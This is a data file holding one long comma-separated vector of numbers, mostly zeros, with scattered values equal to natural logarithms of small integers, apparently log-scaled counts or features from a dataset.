0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 5.278114659230517, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 1.0986122886681098, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.1354942159291497, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.06534854782536, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 